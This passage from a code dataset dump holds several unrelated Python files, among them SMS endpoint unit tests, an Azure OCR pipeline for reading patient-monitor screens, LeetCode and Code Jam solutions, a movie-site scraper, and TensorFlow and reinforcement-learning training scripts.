config.validators(self.topic)['length']\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n \n def test_message_exceeds_twilio_maximum_length(self):\n message = ''.join('c' for i in range(1600))\n expected_response = config.validators(self.topic)['length']\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_message_zero_length(self):\n expected_response = config.validators(self.topic)['length']\n message = ''\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_message_not_parseable(self):\n expected_response = config.validators(self.topic)['parseable']\n message = '%F0%9F%98%AC'\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_good_message(self):\n messages = ['Frank', 'Joe Bob', 'Mary Kate ']\n expected_response = config.accept_response(self.topic)\n for n in messages:\n response = self.test_app.get(self.inbound % (self.topic, n, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_additional_arguments(self):\n message = 'Hello there.'\n from_country = 'USA'\n from_state = 'OR'\n from_city = 'Portland'\n from_zip = '97209'\n\n expected_response = config.accept_response(self.topic)\n inbound_message = self.inbound + '&FromCountry=%s&FromState=%s&FromCity=%s&FromZip=%s'\n response = self.test_app.get(inbound_message %\n (self.topic, message, self.sid, 0, from_country, from_state, from_city, from_zip),\n follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n\n def test_message_construction(self):\n # no additional args\n class Request(object):\n def __init__(self):\n self.method = 'GET'\n self.args = {\n 'From': '+1234567890',\n 'Body': 'Hello, there.',\n 'MessageSid': ''.join(random.choice(string.ascii_letters) for i in range(34))\n }\n self.view_args = {\n 'topic': 'sample'\n }\n\n request = Request()\n message = message_from_request(request=request)\n self.assertTrue(message['number'], request.args['From'])\n self.assertTrue(message['message'], request.args['Body'])\n self.assertTrue(message['sid'], request.args['MessageSid'])\n\n # additional args\n request.args['FromCountry'] = 'USA'\n request.args['FromState'] = 'OR'\n request.args['FromCity'] = 'Portland'\n request.args['FromZip'] = '97209'\n\n additional_args_message = message_from_request(request=request)\n\n self.assertTrue(additional_args_message['from_country'], request.args['FromCountry'])\n self.assertTrue(additional_args_message['from_state'], request.args['FromState'])\n self.assertTrue(additional_args_message['from_city'], request.args['FromCity'])\n self.assertTrue(additional_args_message['from_zip'], request.args['FromZip'])\n\n # with media\n request.args['NumMedia'] = 2\n request.args['MediaUrl0'] = 'http://some.com/some.jpg',\n request.args['MediaContentType0'] = 'image/jpeg'\n request.args['MediaUrl1'] = 'http://some.com/some_other.jpg',\n request.args['MediaContentType1'] = 'image/jpeg'\n\n media_message = message_from_request(request=request)\n\n self.assertEqual(media_message['media']['count'], 2)\n for item in [request.args['MediaUrl0'], request.args['MediaUrl1']]:\n self.assertTrue(item in media_message['media']['media'].keys())\n for item in [request.args['MediaContentType0'], request.args['MediaContentType1']]:\n self.assertTrue(item in media_message['media']['media'].values())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/TestMessageQueue.py","file_name":"TestMessageQueue.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"499039853","text":"#\n# Generator.py \n# Coding: UTF-8 !/usr/bin/env python3\n#\n# Created by 贺嘉炜 on 2017/3/9.\n# Copyright © 2017年 贺嘉炜. All rights reserved.\n#\n\n\nL = [x * x for x in range(10)]\nprint(L)\n\n# g = (x * x for x in range(10))\n# for n in g:\n# print(n)\n\n# 斐波拉契数列用列表生成式写不出来,但是,用函数把它打印出来却很容易:\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\nfib(100)","sub_path":"python/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"443714647","text":"def cal(s):\n\tl1=[]\n\tfor i in range(2,11):\n\t\tn=int(s,i)\n\t\tfor j in range(3,int(n**0.5)+1,2):\n\t\t\tif(n%j==0):\n\t\t\t\tl1.append(j)\n\t\t\t\tbreak\n\tif(len(l1)==9):\n\t\ts1=s\n\t\tfor j in l1:\n\t\t\ts1+=\" \"+str(j)\n\t\tprint(s1)\n\t\treturn 1\n\treturn 0\nl=[]\ndef check(n):\n\tfor i in range(3,int(n**0.5) +1,2):\n\t\tif(n%i==0):\n\t\t\tl.append(n)\n\t\t\tbreak\nfor i in range(2**15+1,2**16 -1,2):\n\tcheck(i)\ndata=open(\"C-small-attempt0.in\",\"r\")\nS=data.read()\nS=S.split(\"\\n\")\nt=int(S[0])#int(input())\nfor i in range(1,t+1):\n\tprint(\"Case #{0}:\".format(i))\n\ts=S[i]\n\tn,j=int(s.split()[0]), int(s.split()[1])\n\tl=[]\n\tfor i in range(2**(n-1)+1,2**n -1):\n\t\tcheck(i)\n\tfor i in l:\n\t\ts=bin(i)[2:]\n\t\tif(s[-1]==\"0\"):\n\t\t\tcontinue\n\t\tk=cal(s)\n\t\tj=j-k\n\t\tif(j==0):\n\t\t\tbreak","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_adarshpandey_codejam3.py","file_name":"16_0_3_adarshpandey_codejam3.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501776570","text":"from azure.cognitiveservices.vision.computervision import ComputerVisionClient\nfrom azure.cognitiveservices.vision.computervision.models import TextOperationStatusCodes\nfrom azure.cognitiveservices.vision.computervision.models import TextRecognitionMode\nfrom azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes\nfrom msrest.authentication import CognitiveServicesCredentials\n\nfrom array import array\nimport os\nfrom PIL import Image\nimport sys\nimport time\nimport io\nimport json\nimport requests\nimport re\nimport cv2\nimport math\nimport numpy as np\n\n\ndef distance(p1, p2):\n xdis = (p1[0]-p2[0])**2\n ydis = (p1[1]-p2[1])**2\n return math.sqrt(xdis + ydis)\n\n\ndef fix_corners(current_corners, last_corners):\n fixed_corners = [[-1,-1], [-1,-1], [-1,-1], [-1,-1]]\n for cp in current_corners:\n min_dis = 500000000\n curr_min = 0\n for i in range(4):\n dis = distance(last_corners[i], cp)\n if dis < min_dis:\n min_dis = dis\n curr_min = i\n fixed_corners[curr_min] = cp\n for i in range(4):\n if fixed_corners[i]==[-1,-1]:\n fixed_corners[i] = last_corners[i]\n return fixed_corners\n\n\ndef order_points(pts):\n rect = np.zeros((4, 2), dtype = \"float32\")\n num_pts = np.array(pts)\n s = num_pts.sum(axis = 1)\n rect[0] = num_pts[np.argmin(s)]\n rect[2] = num_pts[np.argmax(s)]\n diff = np.diff(num_pts, axis = 1)\n rect[1] = num_pts[np.argmin(diff)]\n rect[3] = num_pts[np.argmax(diff)]\n return rect\n\n\ndef four_point_transform(image, pts):\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n # compute the height of the new image, which will be the\n # maximum distance between the top-right and bottom-right\n # y-coordinates or the top-left and bottom-left y-coordinates\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left\n # order\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n # copy = image.copy()\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n # return the warped image\n return warped\n\n\ndef detect_markers(frame):\n '''cv2.imshow('frame',frame)\n if cv2.waitKey(100) & 0xFF == ord('q'):\n pass\n time.sleep(10)'''\n \n '''frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(64,64))\n frame = clahe.apply(frame)'''\n \n dictionary = cv2.aruco.Dictionary_get(cv2.aruco.DICT_4X4_1000)\n parameters = cv2.aruco.DetectorParameters_create()\n # print('detencting')\n fixed_corners = []\n markerCorners, markerIds, rejectedCandidates = cv2.aruco.detectMarkers(frame, dictionary, parameters=parameters)\n clone = frame.copy()\n for mc in markerCorners: # top left, top right, bottom right and bottom left.\n # cv2.rectangle(clone, (mc[0][3][0], mc[0][3][1]), (mc[0][1][0], mc[0][1][1]), (0, 255, 0), 2)\n fixed_corners.append((np.mean([mc[0][0][0], mc[0][1][0], mc[0][2][0], mc[0][3][0]]),np.mean([mc[0][0][1], mc[0][1][1], mc[0][2][1], mc[0][3][1]])))\n \n #cv2.imshow(\"Window\", clone)\n #cv2.waitKey(1)\n #time.sleep(3)\n return fixed_corners\n\n\ndef create_areas(area_dict, img):\n s = img.shape\n height, width = s[0], s[1]\n areas = []\n for key, value in area_dict.items():\n hmin, hmax, wmin, wmax = value\n hmin *= height\n hmax *= height\n wmin *= width\n wmax *= width\n new_area = [img[math.ceil(hmin):math.ceil(hmax), math.ceil(wmin):math.ceil(wmax)], hmin, wmin]\n areas.append(new_area)\n return areas\n\ndef transform_coords(coords, area):\n fixed_coords = []\n for j in range(8):\n if j%2==0:\n fixed_coords.append(coords[j] + area[2])\n else:\n fixed_coords.append(coords[j] + area[1])\n return fixed_coords\n \ndef transform_boundries(boundry_dict):\n fixed_dict = {}\n for key, value in boundry_dict.items():\n fixed_value = [value[0][0]-5, value[1][0]+5, value[0][1]-5, value[1][1]+5]\n fixed_dict[key] = fixed_value\n return fixed_dict\n \n\ndef create_bounded_output(readings, boundings, boundries, method = 3):\n output_dict = {}\n for key in boundries.keys():\n for i in range(len(readings)):\n if method == 1 : # area contain\n if check_boundry(boundings[i], boundries[key]): #c heck if temp rect in bigger rect\n output_dict[key] = readings[i]\n elif method == 2: # area intersection\n if check_overlap(boundings[i], boundries[key]): # using precentage of interseection, greater than 0.7 is true!\n output_dict[key] = readings[i]\n elif method == 3: # dot and contain\n if check_dot(boundings[i], boundries[key]): # rectangle containing center point\n output_dict[key] = readings[i]\n if key not in output_dict.keys():\n output_dict[key] = \"N/A\"\n # output_dict[key] = None\n return output_dict\n\n\"\"\"\ndef create_bounded_output(readings, boundings, boundries):\n output_dict = {}\n for key in boundries.keys():\n for i in range(len(readings)):\n if check_boundry(boundings[i], boundries[key]):\n output_dict[key] = readings[i]\n if key not in output_dict.keys():\n output_dict[key] = \"N/A\"\n return output_dict\n\"\"\"\n\n\ndef check_overlap(temp_bounding, hard_bounding):\n a = [hard_bounding[0][0],hard_bounding[0][1],hard_bounding[1][0],hard_bounding[1][1]]\n b = [temp_bounding[0],temp_bounding[1],temp_bounding[4],temp_bounding[5]]\n total_area = (a[2] - a[0]) * (a[3] - a[1])\n dx = min(a[2], b[2]) - max(a[0], b[0])\n dy = min(a[3], b[3]) - max(a[1], b[1])\n if (dx>=0) and (dy>=0):\n if float((dx * dy) / total_area) > 0.7:\n return True\n return False\n\n \ndef check_dot(temp_bounding, hard_bounding):\n # center_dot = (hard_bounding[0][0] + (hard_bounding[1][0] - hard_bounding[0][0])/ 2 , hard_bounding[0][1] + (hard_bounding[1][1] - hard_bounding[0][1])/ 2)\n center_dot = (hard_bounding[0] + (hard_bounding[1] - hard_bounding[0])/ 2 , hard_bounding[2] + (hard_bounding[3] - hard_bounding[2])/ 2)\n if center_dot[0] >= temp_bounding[0] and center_dot[0] <= temp_bounding[4] and center_dot[1] >= temp_bounding[1] and center_dot[1] <= temp_bounding[5]:\n return True\n return False\n\n\ndef check_boundry(bounding, boundry):\n output = bounding[0]>=boundry[0]\n output = output and (bounding[6]>=boundry[0])\n output = output and (bounding[2]<=boundry[1])\n output = output and (bounding[4]<=boundry[1])\n output = output and (bounding[1]>=boundry[2])\n output = output and (bounding[3]>=boundry[2])\n output = output and (bounding[5]<=boundry[3])\n output = output and (bounding[7]<=boundry[3])\n return output \n\n\ndef fix_string(s):\n json_string_fin = \"\"\n last_c=\"\"\n for c in s:\n if c!=\"\\'\":\n json_string_fin += c\n if c==\"{\":\n if last_c==\"\\'\":\n json_string_fin = last_string + \"\\'{\"\n else:\n last_string = json_string_fin\n if last_c!=\"}\":\n json_string_fin += \"\\\"\"\n else:\n json_string_fin += \"\\'\"\n last_c = c\n return json_string_fin\n\ndef output_former(ocr_res, room, pat_id, mon_id):\n string_json = json.dumps(ocr_res)\n json_dict = {}\n json_dict[\"JsonData\"] = string_json\n json_dict[\"MonitorID\"] = mon_id\n json_dict[\"PatientID\"] = pat_id\n json_dict[\"Room\"] = room\n json_dict_string = str(json_dict)\n print(json_dict_string)\n output = fix_string(json_dict_string)\n return output\n\n\ndef sockets_output_former(ocr_res, room, pat_id, mon_id):\n json_dict = {}\n json_dict[\"JsonData\"] = ocr_res\n json_dict[\"MonitorID\"] = mon_id\n json_dict[\"PatientID\"] = pat_id\n json_dict[\"Room\"] = room\n output = json.dumps(json_dict)\n print(output)\n\n return output\n\n\n\ndef get_digits(img, computervision_client):\n # encodedFrame = cv2.imencode(\".jpg\", img)[1].tostring()\n recognize_printed_results = computervision_client.batch_read_file_in_stream(io.BytesIO(img), raw = True)\n # Reading OCR results\n operation_location_remote = recognize_printed_results.headers[\"Operation-Location\"]\n operation_id = operation_location_remote.split(\"/\")[-1]\n while True:\n get_printed_text_results = computervision_client.get_read_operation_result(operation_id)\n if get_printed_text_results.status not in ['NotStarted', 'Running']:\n break\n time.sleep(0.1)\n \n tmp_frame = cv2.imdecode(np.frombuffer(img, np.uint8), -1)\n results = []\n text_flag = False\n show_frame_flag = False\n if get_printed_text_results.status == TextOperationStatusCodes.succeeded:\n for text_result in get_printed_text_results.recognition_results:\n for line in text_result.lines:\n # print(line.text, line.bounding_box)\n s = re.sub('[^0123456789./]', '', line.text)\n if s != \"\":\n if s[0] == \".\":\n s = s[1:]\n s = s.rstrip(\".\")\n text_flag = True\n cv2.rectangle(tmp_frame, (int(line.bounding_box[0]), int(line.bounding_box[1])), (int(line.bounding_box[4]), int(line.bounding_box[5])), (255,0,0), 2)\n cv2.putText(tmp_frame,s,(int(line.bounding_box[0])-5, int(line.bounding_box[1])-5),cv2.FONT_HERSHEY_COMPLEX,0.3,(0,0,0),1)\n results.append((s, line.bounding_box))\n else:\n continue\n if text_flag and show_frame_flag:\n cv2.imshow(\"image\", tmp_frame)\n cv2.waitKey(0)\n return(results)\n\n\n\ndef AnalyzeFrame(frame, computervision_client, boundries, ocrsocket):\n frame = cv2.imdecode(np.frombuffer(frame, np.uint8), -1)\n \n # Find ARuco corners:\n new_corners = detect_markers(frame)\n corners = [(529.0, 380.75), (157.5, 380.5), (604.75, 172.25), (101.25, 168.0)] #mon3\n # corners = [(120.0, 404.0), (532.25, 386.0), (573.0, 124.0), (80.75, 113.5)] #mon4\n\n # TODO: raise exception if more than one corner wasn't detected:\n fixed_corners = fix_corners(new_corners, corners)\n # pts = order_points(fixed_corners)\n frame = four_point_transform(frame, fixed_corners)\n\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n # rectKernel = cv2.getStructuringElement(cv2.MORPH_RECT, (9,3))\n # frame = cv2.morphologyEx(gray,cv2.MORPH_TOPHAT, gray)\n\n # TODO: get area_dicts from MOB/DB\n #areas_dict = {'side': [0, 1, 0.7, 0.9], 'bottom': [0.6, 0.9, 0.3, 0.7]} #will be an input later! #monitor 1\n areas_dict = {'side': [0.1, 0.9, 0.67, 0.92]} #will be an input later! #monitor 3\n areas_dict = {'low': [0.6, 0.85, 0, 0.5], 'side': [0.1, 0.9, 0.6, 0.9]}\n areas = create_areas(areas_dict, frame)\n\n # our output\n readings = {}\n boundings = {}\n i = 0\n for area in areas:\n results = get_digits(cv2.imencode(\".jpg\", area[0])[1], computervision_client)\n for item in results:\n readings[i] = item[0]\n boundings[i] = transform_coords(item[1], area)\n i = i + 1\n # boundry_dict = {i:[min(x[0],x[6]) -15,max(x[2],x[4]) +15 ,min(x[3],x[1]) -15,max(x[5],x[7]) + 15] for i,x in enumerate(boundings.values())}\n # boundry_temp_mon32 = {0: ((471.0, 129), (516.0, 165)), 1: ((464.0, 170), (533.0, 213)), 2: ((469.0, 222), (541.0, 244)), 3: ((469.0, 272), (508.0, 306)), 4: ((471.0, 315), (505.0, 351))}\n \n # MES-Setup inpurt by hand. TODO: get from API in the begining\n boundry_temp_mon32 = {0: ((132, 316.0), (246, 345.0)), 1: ((449.0, 172.0), (509.0, 221.0)), 2: ((439.0, 230.0), (485.0, 269.0)), 3: ((435.0, 271.0), (483.0, 312.0))}\n helka_dictionary = {0: [374.0, 18.0, 429.0, 18.0, 429.0, 51.0, 374.0, 52.0], 1: [370.0, 59.0, 419.0, 59.0, 417.0, 93.0, 369.0, 92.0], 2: [358.0, 96.0, 419.0, 92.0, 420.0, 128.0, 358.0, 122.0], 3: [34.0, 132.0, 197.0, 134.0, 196.0, 163.0, 33.0, 160.0]} #mon3\n boundry_temp_mon32 = {0: ((365.0, 26.0), (379.0, 39.0)), 1: ((380.0, 17.0), (437.0, 53.0)), 2: ((375.0, 61.0), (425.0, 95.0)), 3: ((377.0, 96.0), (429.0, 131.0)), 4: ((58.0, 140.0), (160.0, 166.0)), 5: ((93.0, 164.0), (140.0, 177.0))}\n temp_mon = {k:[[v[0],v[1]],[v[4],v[5]]] for k,v in helka_dictionary.items()} #translate dic to normal version\n\n output = create_bounded_output(readings, boundings, transform_boundries(boundry_temp_mon32), 3)\n # output = create_bounded_output(readings, boundings, temp_mon, 3)\n # print(output)\n\n \n # TODO: get as input, when Shany's team is ready\n pat_id = \"200465524\"\n room = \"13\"\n mon_id = \"90210\"\n json_to_socket = sockets_output_former(output, room, pat_id, mon_id)\n ocrsocket.emit('data', json_to_socket)\n return\n\n\n json_string_fin = output_former(output, room, pat_id, mon_id)\n print(json_string_fin)\n url = \"http://rstreamapp.azurewebsites.net/api/InsertMonitorData\"\n headers={'Content-type':'application/json', 'Accept':'application/json'}\n response = requests.post(url, data=json_string_fin, headers=headers)\n\n # TODO: sanity check results (charecters etc.) and send them to somewhere\n return\n\n\n","sub_path":"AnalyzeFrame.py","file_name":"AnalyzeFrame.py","file_ext":"py","file_size_in_byte":14360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"283833786","text":"#\n# @lc app=leetcode.cn id=103 lang=python3\n#\n# [103] 二叉树的锯齿形层次遍历\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def __init__(self):\n self.ans=[[]]\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return []\n self.ans[0]=[root.val]\n if root.left or root.right:\n self.gogogo(root.left,root.right,1)\n res=[x for x in self.ans if x!=[]]\n for i in range(len(res)):\n if i%2==1:\n res[i]=list(reversed(res[i]))\n return res\n def gogogo(self,node1,node2,dep):\n self.ans.append([])\n if node1:\n self.ans[dep].append(node1.val)\n if node1.left or node1.right:\n self.gogogo(node1.left,node1.right,dep+1)\n if node2: \n self.ans[dep].append(node2.val)\n if node2.left or node2.right:\n self.gogogo(node2.left,node2.right,dep+1)\n\n\n\n# @lc code=end\n\n","sub_path":"103.二叉树的锯齿形层次遍历.py","file_name":"103.二叉树的锯齿形层次遍历.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"319459285","text":"import tensorflow as tf\nimport numpy as np\nimport tf_ocr\nimport matplotlib.pyplot as plt\nimport csv\nimport re\n\ncross_title = ['times', 'gradient-0.05_cross', 'gradient-0.1_cross', 'gradient-0.2_cross', 'gradient-0.5_cross',\n 'gradient-0.8_cross', 'adam-le-4_cross', 'adag-0.2_cross']\n\naccuracy_title = ['', 'times', 'gradient-0.05_accuracy', 'gradient-0.1_accuracy', 'gradient-0.2_accuracy',\n 'gradient-0.5_accuracy', 'gradient-0.8_accuracy', 'adam-le-4_accuracy', 'adag-0.2_accuracy']\n\ntotal_title = cross_title + accuracy_title\n\ntrain_method_list = [tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.AdamOptimizer,\n tf.train.AdagradOptimizer]\n\ntrain_step_list = [0.05, 0.1, 0.2, 0.5, 0.8, 1e-4, 0.2]\n\ncsv_name = './result/result.csv'\nresult_name = './result/result.txt'\nresult_fig = './result/result.jpg'\n\ndef init():\n with open(csv_name, 'w') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=total_title)\n writer.writeheader()\n\n with open(result_name, 'w+') as f:\n for i in range(200):\n buf = 'times_' + str(i*50) + ',\\n'\n f.writelines(buf)\n f.close()\n\ndef save_result(cnt, cross, accuracy):\n global line\n global buf\n print(\"%d: \" %cnt)\n print(cross)\n print(accuracy)\n\n with open(result_name, 'r') as f:\n for line in f.readlines():\n if line.find('times_' + str(cnt)) >= 0:\n buf = line.rstrip() + str(cross) + ',' + str(accuracy) + ',\\n'\n break\n open(result_name, 'r+').write(re.sub(line, buf, open(result_name).read()))\n\ndef save_csv(result_path, result_csv):\n global line\n global cross_list\n global accuracy_list\n global total_list\n with open(result_path, 'r') as f:\n with open(csv_name, 'a+') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=',')\n for line in f.readlines():\n accuracy_list = []\n cross_list = []\n total_list = line.split(',')\n cross_list.append(total_list[0])\n for i, value in enumerate(total_list):\n if i%2 == 0:\n accuracy_list.append(value)\n else:\n cross_list.append(value)\n cross_list[-1] = ''\n print(accuracy_list)\n print(cross_list)\n csv_writer.writerow(cross_list + accuracy_list)\n\ndef plot_result(result_csv, result_plot):\n # matlib plot function to display data input with output\n fig = plt.figure()\n # subplot(x, y, postion)\n ax = fig.add_subplot(1, 1, 1)\n\n ax.set_title('training cross')\n plt.xlabel('times')\n plt.ylabel('cross')\n\n global x\n global y_list\n global line_list\n\n line_list = ['r-', 'r:', 'b-', 'b:', 'g-', 'g:', 'y-']\n y_list = np.zeros((7, 200))\n x = np.linspace(0, 10000, 200)\n for i in range(7):\n with open(result_csv,'r') as csvfile:\n reader = csv.DictReader(csvfile)\n column = [row[cross_title[i+1]] for row in reader]\n y_list[i] = np.array(column)\n ax.plot(x, y_list[i], line_list[i], lw=1, label=cross_title[i+1])\n\n #loc = location\n plt.legend(loc=1, fontsize=\"small\")\n #plt.ioff()\n #show graphic\n #plt.show()\n plt.savefig(result_plot)\n\n\n\n\nif __name__ == '__main__':\n init()\n for i in range(7):\n tf_ocr.tf_ocr_train(train_method_list[i], train_step_list[i], save_result, method='train')\n save_csv(result_name, csv_name)\n plot_result(csv_name, result_fig)","sub_path":"tf4_ocr_nn/tf_ocr_io.py","file_name":"tf_ocr_io.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"341505635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 6 21:52:44 2019\r\n\r\n@author: lison\r\n\"\"\"\r\n\r\nimport re\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom lxml import html\r\n\r\ngetid = re.compile(r'\\d+')\r\nids = []\r\nurl_main = \"http://www.rotomato.com/sort/newmovie/page/\"\r\nurl_page = \"http://www.rotomato.com/archives/\"\r\ndef get_ids(url):\r\n for i in range(1,10):\r\n url_newmovie = url + str(i)\r\n con = requests.get(url_newmovie).content\r\n sel = html.fromstring(con)\r\n infos = sel.xpath('//article')\r\n for movie in infos:\r\n id = movie.xpath('@id')\r\n #titles = movie.xpath('a/@title')\r\n ids.append(str(id)[7:11])\r\n\r\ndef get_movies(_ids):\r\n k=1\r\n for _id in _ids:\r\n url_movie = url_page+_id\r\n con = requests.get(url_movie).content\r\n sel = html.fromstring(con)\r\n title = sel.xpath('//meta[@property=\"og:description\"]/@content')\r\n code = sel.xpath('//code/a/@href')\r\n with open(\"rotomato.txt\",'a',encoding=\"utf-8\") as f:\r\n f.write(str(k)+\" : \"+'*'*60+\"\\n\"+title[0]+\"\\n\"+\"下载链接:\"+code[0]+\"\\n\")\r\n k=k+1\r\n\r\nif __name__==\"__main__\":\r\n get_ids(url_main)\r\n get_movies(ids)\r\n","sub_path":"爬虫/pa_5_rotomato.py","file_name":"pa_5_rotomato.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"27385248","text":"from policy_model import PolicyModel\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport gym\nimport argparse\nimport pickle\n\n\n#Parse arguments\n#----------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--env\", default=\"BipedalWalker-v2\")\nparser.add_argument(\"--render\", action=\"store_true\")\nparser.add_argument(\"--unwrap\", action=\"store_true\")\nargs = parser.parse_args()\n\n\n#Parameters\n#----------------------------\nenv_id = args.env\nis_render = args.render\nsave_dir = \"./save_\" + env_id\nn_episode = 1000\n\n\n#Create the environment\n#----------------------------\nenv = gym.make(env_id)\nif args.unwrap: env = env.unwrapped\na_dim = env.action_space.shape[0]\na_low = env.action_space.low[0]\na_high = env.action_space.high[0]\ns_dim = env.observation_space.shape[0]\n\n\n#Create the model\n#----------------------------\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\npolicy = PolicyModel(sess, s_dim, a_dim, a_low, a_high)\n\n\n#Start playing\n#----------------------------\nsess.run(tf.global_variables_initializer())\nlogstd = np.zeros((1, a_dim), dtype=np.float32)\nlogstd.fill(-4.0)\n\n#Load the model\nsaver = tf.train.Saver(max_to_keep=2)\nckpt = tf.train.get_checkpoint_state(save_dir)\nif ckpt:\n\tprint(\"Loading the model ... \", end=\"\")\n\tsaver.restore(sess, ckpt.model_checkpoint_path)\n\tprint(\"Done.\")\n\ntraj = []\n\nfor i in range(n_episode):\n\tob = env.reset()\n\ttotal_reward = 0\n\ttraj.append([])\n\n\twhile True:\n\t\tif is_render: env.render()\n\t\taction = policy.action_step(np.expand_dims(ob.__array__(), axis=0), logstd)\n\t\ttraj[i].append(np.hstack([ob, action[0]]))\n\n\t\tob, reward, done, info = env.step(action[0])\n\t\ttotal_reward += reward\n\n\t\tif done:\n\t\t\tprint(\"Episode {:d}\".format(i))\n\t\t\tprint(\"----------------------------\")\n\t\t\tprint(\"total_reward = {:.4f}\".format(total_reward))\n\t\t\tprint(\"Episode length = {:d}\".format(len(traj[i])))\n\t\t\tprint()\n\t\t\tbreak\n\nprint(\"Saving the trajectories ... \", end=\"\")\npickle.dump(traj, open(os.path.join(save_dir, \"traj.pkl\"), \"wb\"))\nprint(\"Done.\")","sub_path":"tf/ppo/conti/sample_traj.py","file_name":"sample_traj.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"505497784","text":"\"\"\"\r\nUtilities for game\r\nDate: 02-02-2021\r\n\"\"\"\r\nfrom item import *\r\n\r\ndef loadChoices(filename):\r\n \"\"\"load choices data from file, return list of choice objs\"\"\"\r\n inf = open(filename,\"r\")\r\n lines = inf.readlines()\r\n inf.close()\r\n choices = []\r\n for line in lines:\r\n scenario,consequence,exp,cfoot,consq_alt,exp_alt,cfoot_alt,tag,ptag = line.strip().split(\";\")\r\n c = Item(scenario, consequence, int(exp), int(cfoot), consq_alt, int(exp_alt), int(cfoot_alt), tag, ptag)\r\n choices.append(c)\r\n return choices\r\n\r\ndef menu(opts):\r\n \"\"\"display menu, given a list, make sure we get valid menu input\"\"\"\r\n for i in range(len(opts)):\r\n print(\"%2d. %s\" % (i+1,opts[i]))\r\n min = 1\r\n max = len(opts)\r\n while True:\r\n pick = getInt(\"Your choice? \")\r\n if pick >= min and pick <= max:\r\n return pick\r\n else:\r\n print(\"please enter a valid choice!!!\")\r\n\r\ndef getInt(prompt):\r\n \"\"\"get a positive integer\"\"\"\r\n n = input(prompt)\r\n if n.isdigit():\r\n return int(n)\r\n else:\r\n return 